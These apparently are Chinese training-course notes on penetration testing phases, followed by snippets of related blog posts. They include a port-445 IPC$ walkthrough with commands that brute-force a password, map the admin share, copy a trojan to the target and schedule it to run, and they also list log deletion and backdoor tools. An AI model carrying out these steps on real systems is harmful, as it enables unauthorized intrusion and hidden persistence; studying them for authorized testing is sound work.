目錄
滲透測試
滲透測試
0、授權
1、資訊收集
nslookup whois
2、掃瞄漏洞
nmap = ip範圍 埠號
軟體用:scanport
高階掃瞄:如iis漏洞 2003-iis6.0 2008-iis7.0
掃瞄**漏洞
3、漏洞利用
4、提權(shell(命令列cmd)環境、桌面環境、最高許可權)
5、毀屍滅跡(即刪除產生的一些日誌)
6、製作木馬(留後門)
軟體:灰鴿子遠端控制【黑防專版】
現在本地做乙個可執行檔案,然後利用copy命令遠端拷貝到伺服器上去,在利用at命令設定乙個遠端定時任務執行可執行檔案
7、滲透測試報告
手動測試埠號開放與否
telnet ip 位址 測試埠
445漏洞利用之ipc$:
1、scanport掃瞄445埠
2、進行暴力破解目標伺服器密碼
3、
net use 起的別名 \\目標主機ip\ipc$ 目標主機密碼 /user:使用者例如:net use f: \\
10.1.1.1\ipc$ 123.com /user:admin
net use * /del 刪除上述所建
4、製作木馬
軟體:牧民戰天兔殺
5、植入木馬(留後門)
copy d:\heihei.exe \\10.1.1.2\c$其中d:\heihei.exe為本機生成的木馬檔案
6、設計計畫任務自動執行木馬:
net time \\10.1.1.2檢視目標主機時間
at \\
10.1.1.2 時間 "
c:\heihei.exe
"
7、等待肉雞上線
千鋒網路安全2
子網掩碼 區域網通訊規則 在同一區域網中,所有ip必須在同一網段才可以通訊 ip構成 網路位 主機位 網路位ip位址相同,為同一網段 子網掩碼 用來確定ip位址的網路位 ip位址詳解 ios定義五大類 a類 1 126 預設子網掩碼255.0.0.0 b類 128 191 預設子網掩碼 255.25...
千鋒網路安全 命令埠整理
當前使用者whoami 當前使用者idwhoami user 列出所有共享檔案net share 刪除共享檔案net share 共享名 del 新增共享檔案net share 共享名 路徑 登錄檔 regedit services.msc 釋放ipipconfig release ipconfig...
學習筆記 網路安全滲透測試滲透測試流程
作為一次玩過安全滲透測試的執行者,首先要明確在整個滲透測試過程中需要進行的工作。當接收到客戶的滲透測試任務時,往往對於所要進行的目標知之甚少或者一無所知。而在滲透結束的時候,對目標的了解程度已經遠遠超過客戶。在此期間需要從事大量的研究工作,整個滲透過程可以分為以下七個階段 確定滲透測試所涉及的ip位...